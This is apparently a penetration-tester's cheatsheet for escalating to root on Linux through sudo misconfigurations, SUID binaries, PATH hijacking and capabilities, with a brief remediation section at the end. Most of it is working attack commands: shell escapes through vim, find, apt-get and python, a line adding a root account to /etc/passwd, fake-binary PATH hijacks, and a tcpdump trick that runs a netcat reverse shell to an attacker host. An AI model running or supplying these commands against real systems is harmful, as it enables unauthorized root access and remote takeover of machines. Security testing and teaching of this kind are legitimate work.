Linux PrivEsc Permissions Sudo

🛡️ Methodology Checklist

• sudo -l — identify all allowed commands
• Cross-reference every allowed binary with GTFOBins
• SUID binaries: find / -perm -4000 -type f 2>/dev/null
• Cross-reference SUID hits with GTFOBins
• Check world-writable scripts executed as root
• Check /etc/passwd and /etc/shadow permissions
• Inspect /etc/sudoers and /etc/sudoers.d/* for weak entries

---

🎯 Operational Context

Use when: User has sudo access — check sudo -l for NOPASSWD entries, restricted commands with bypass, and LD_PRELOAD tricks. Think Dumber First: sudo -l is the first command after getting a shell. NOPASSWD on any binary = check GTFOBins immediately. sudo vim → :!bash. sudo find → -exec /bin/bash \;. Most GTFOBins bypasses work in under 30 seconds. Skip when: Sudo requires password and no password is known — pivot to other privesc paths.

---

⚡ Tactical Cheatsheet

Command	Tactical Outcome
sudo -l	List sudo rights — NOPASSWD entries = instant privesc
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null	Find SUID binaries (bit -4000)
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null	Find SGID binaries (bit -6000)
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh	apt-get sudo escape to root shell
PATH=.:$PATH; export PATH	Prepend current dir to PATH for hijacking
echo '/bin/bash -p' > [BINARY_NAME]; chmod +x [BINARY_NAME]	Create fake binary for PATH abuse
echo 'root2:$(openssl passwd -1 pass):0:0:root:/root:/bin/bash' >> /etc/passwd	Add root user if /etc/passwd writable
strings [SUID_BINARY]	Find unqualified command calls (PATH abuse target)
ltrace [SUID_BINARY]	Trace library calls — find unqualified commands
sudo /usr/sbin/tcpdump -ln -i [IFACE] -w /dev/null -W 1 -G 1 -z /tmp/.exploit.sh -Z root	tcpdump sudo escape via -z postrotate
find /etc/sudoers.d/ -type f 2>/dev/null	Check modular sudoers files
getcap -r / 2>/dev/null	Find binaries with Linux capabilities

---

🔬 Deep Dive & Workflow

SUID Exploitation Flow

1. find / -user root -perm -4000 2>/dev/null
2. Cross-reference results at GTFOBins (https://gtfobins.github.io/)
3. Look for non-standard/unexpected binaries with SUID
4. Custom binaries: strings → ltrace → identify unqualified calls
5. Small 's' = SUID+exec set (exploitable)
   Capital 'S' = SUID only, no exec bit (usually broken)

High-value SUID targets:

Binary	Exploit Method
find	find . -exec /bin/sh -p \; -quit
vim	:!/bin/bash
python	python -c 'import os; os.execl("/bin/sh","sh","-p")'
nmap (old)	nmap --interactive → !sh
pkexec	PwnKit CVE-2021-4034
screen-4.5.0	Known LPE

Sudo Abuse Patterns

# sudo -l reveals: (root) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/bash'
 
# (root) NOPASSWD: /usr/sbin/tcpdump
cat > /tmp/.exploit.sh << 'EOF'
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [LHOST] [LPORT] >/tmp/f
EOF
chmod +x /tmp/.exploit.sh
sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.exploit.sh -Z root
 
# (root) NOPASSWD: /usr/bin/apt-get
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

AppArmor note: Blocks tcpdump -z on Ubuntu 20.04+ → gives “Permission Denied” even as root.

PATH Hijacking

# 1. Find SUID binary that calls commands without absolute path
strings /usr/local/sbin/suid_binary | grep -v '/'
# → finds unqualified "cat", "id", "ls" etc.
 
# 2. Create fake binary in writable location
cd /tmp
echo '/bin/bash -p' > cat
chmod +x cat
 
# 3. Prepend /tmp to PATH
PATH=/tmp:$PATH
export PATH
 
# 4. Run SUID binary → it calls /tmp/cat instead of /bin/cat → root shell
/usr/local/sbin/suid_binary

Cleanup: Restore PATH or use absolute paths during exploitation.

Linux Capabilities (Alternative to SUID)

# Enumerate capabilities
getcap -r / 2>/dev/null
# Dangerous: cap_setuid+ep, cap_net_raw+ep
 
# python3 with cap_setuid
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

---

🛠️ Troubleshooting & Edge Cases

Problem	Cause	Fix
sudo -l requires password	Auth required for sudo list	Try anyway: sudo -l sometimes shows entries without password if NOPASSWD configured
sudo command escapes not working	Shell escaping restricted	Try env variables: check if env_keep+=LD_PRELOAD is in sudoers — LD_PRELOAD with sudo = root
sudo binary on GTFOBins but shell not working	AppArmor or SELinux restricting	Check: aa-status or sestatus; AppArmor may restrict even SUID/sudo binaries
sudo version old — CVE-2021-3156	sudo < 1.9.5p2	Exploit heap overflow: check version sudo --version; PoC available on GitHub
Restricted sudo with command arguments	Wildcard in allowed command	sudo /usr/bin/vim /etc/hosts with wildcard = sudo /usr/bin/vim /etc/hosts -c '!bash'

---

📝 Reporting Trigger

Finding Title: Sudo Misconfiguration Enables Privilege Escalation to Root Impact: NOPASSWD sudo entry or exploitable sudo configuration allows the compromised user to execute commands as root without authentication, achieving complete system privilege without any additional vulnerability exploitation. Root Cause: Sudo rules granting NOPASSWD access to binaries with known shell escape sequences (vim, find, python, perl). No audit of sudo rules against GTFOBins escape catalog. Recommendation: Review all sudo rules and remove NOPASSWD entries for interactive binaries. Use sudoedit for file editing rather than sudo vim. Restrict sudo to specific commands with exact arguments where possible. Audit against GTFOBins for each allowed binary.

---

🔗 Related Nodes

• Linux_PrivEsc_Enumeration
• Linux_PrivEsc_Services_Cron